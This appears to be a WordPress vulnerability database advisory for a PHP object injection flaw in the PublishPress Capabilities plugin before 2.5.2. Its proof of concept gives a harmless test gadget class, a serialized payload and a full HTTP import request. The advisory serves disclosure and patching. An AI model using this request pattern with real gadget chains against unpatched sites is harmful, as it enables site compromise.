WordPress Plugin Vulnerabilities
PublishPress Capabilities < 2.5.2 - Admin+ PHP Objection Injection
Description
The plugin unserializes the content of imported files, which could lead to PHP object injection attacks by administrators, on multisite WordPress configurations. Successful exploitation in this case requires other plugins with a suitable gadget chain to be present on the site.
Proof of Concept
To simulate a gadget chain, put the following code in a plugin class Evil { public function __wakeup() : void { die("Arbitrary deserialization"); } } Create a file named settings.json with the following content and import if: O:4:"Evil":0:{}; POST /wp-admin/admin.php?page=pp-capabilities-backup HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/admin.php?page=pp-capabilities-backup Content-Type: multipart/form-data; boundary=---------------------------293588204025713533762090348603 Content-Length: 1198 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 -----------------------------293588204025713533762090348603 Content-Disposition: form-data; name="_wpnonce" 9ca77a826e -----------------------------293588204025713533762090348603 Content-Disposition: form-data; name="_wp_http_referer" /wordpress/wp-admin/admin.php?page=pp-capabilities-backup -----------------------------293588204025713533762090348603 Content-Disposition: form-data; name="pp_capabilities_export_section[]" user_roles -----------------------------293588204025713533762090348603 Content-Disposition: form-data; name="pp_capabilities_export_section[]" capsman_editor_features_backup -----------------------------293588204025713533762090348603 Content-Disposition: form-data; name="pp_capabilities_export_section[]" capsman_admin_features_backup -----------------------------293588204025713533762090348603 Content-Disposition: form-data; name="import_file"; filename="capabilities-export-2022-09-27_3-28-28_am.json" Content-Type: application/json O:4:"Evil":0:{}; -----------------------------293588204025713533762090348603 Content-Disposition: form-data; name="import_backup" Import -----------------------------293588204025713533762090348603--
Affects Plugins
References
CVE
Classification
Type
OBJECT INJECTION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Nguyen Pham Viet Nam
Submitter
Nguyen Pham Viet Nam
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-10-10 (about 1 years ago)
Added
2022-10-10 (about 1 years ago)
Last Updated
2022-10-10 (about 1 years ago)